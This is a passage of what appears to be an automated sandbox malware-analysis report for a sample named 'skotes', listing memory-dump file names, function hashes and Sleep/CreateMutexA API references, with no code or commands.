Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 8f2740f0f65946da64c65b3a8ef6cef33e4ba3b49ea8ded0c9fb3e710f22cac8
Instruction ID: 3ae3473ceb7078c3f4505a59dead7564b2bde39959ef530caba6d655324b1ec3
Opcode Fuzzy Hash: 8f2740f0f65946da64c65b3a8ef6cef33e4ba3b49ea8ded0c9fb3e710f22cac8
Instruction Fuzzy Hash: EFE0EC31181248AECF257B58C80DE4C3B69EF95751F154815F9199A32ACB25EE82CB90

Function 00959BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 12640ec9d405cba2aea7a4d2f0d32ef2ef65ca591aef2afc4cd54972f2b9576d
Instruction ID: 5e8420dc78317a45b35ebee2a49efae1c68be06623ce048bb7e538eb26bb43f5
Opcode Fuzzy Hash: 12640ec9d405cba2aea7a4d2f0d32ef2ef65ca591aef2afc4cd54972f2b9576d
Instruction Fuzzy Hash: E1314431B44201CBFB08DB7DDD9976DBB66EBC6311F208318E8549B3D6C77589888B92

Function 00959F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 467f5c38c96902148e1b42edeb34bdc83351d3a7ec8b51ac2a7414c6d128fb91
Instruction ID: cdcca9acd4d0811fe8bc8f8f9a67e23b5670707d4378cd267d7f499dd6c40748
Opcode Fuzzy Hash: 467f5c38c96902148e1b42edeb34bdc83351d3a7ec8b51ac2a7414c6d128fb91
Instruction Fuzzy Hash: 98316831B142018BEB18DB79DD997ADB766EFC6311F208718E814DB2D1C73589888B56

Function 0095A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: db1fa48cacf98c07f231fd52a5f0f81cdef2b6e5c14227f647670131ee557120
Instruction ID: 1cbf1e90adb9b168be3c01701ad73a1344dea903ecc7ff1d6d47ffc8cf2eabce
Opcode Fuzzy Hash: db1fa48cacf98c07f231fd52a5f0f81cdef2b6e5c14227f647670131ee557120
Instruction Fuzzy Hash: 1F319931B542018BEB08DB79CDD976DB766EBC6311F208318E8249B3D1C73699888B5A

Function 0095A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 66a5265948360f75c60326af2bf7aebc1f7421258ff7f2907a7af785b2a96a8d
Instruction ID: 5e7cfd47ed27e2d2a65eff9c3e62220935feaa397b33fa55323663e73b0d8405
Opcode Fuzzy Hash: 66a5265948360f75c60326af2bf7aebc1f7421258ff7f2907a7af785b2a96a8d
Instruction Fuzzy Hash: 18316831B042019FEB08DB7DDDDD76DB766EBC6311F208319E8249B2D1C73699888B5A

Function 0095A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

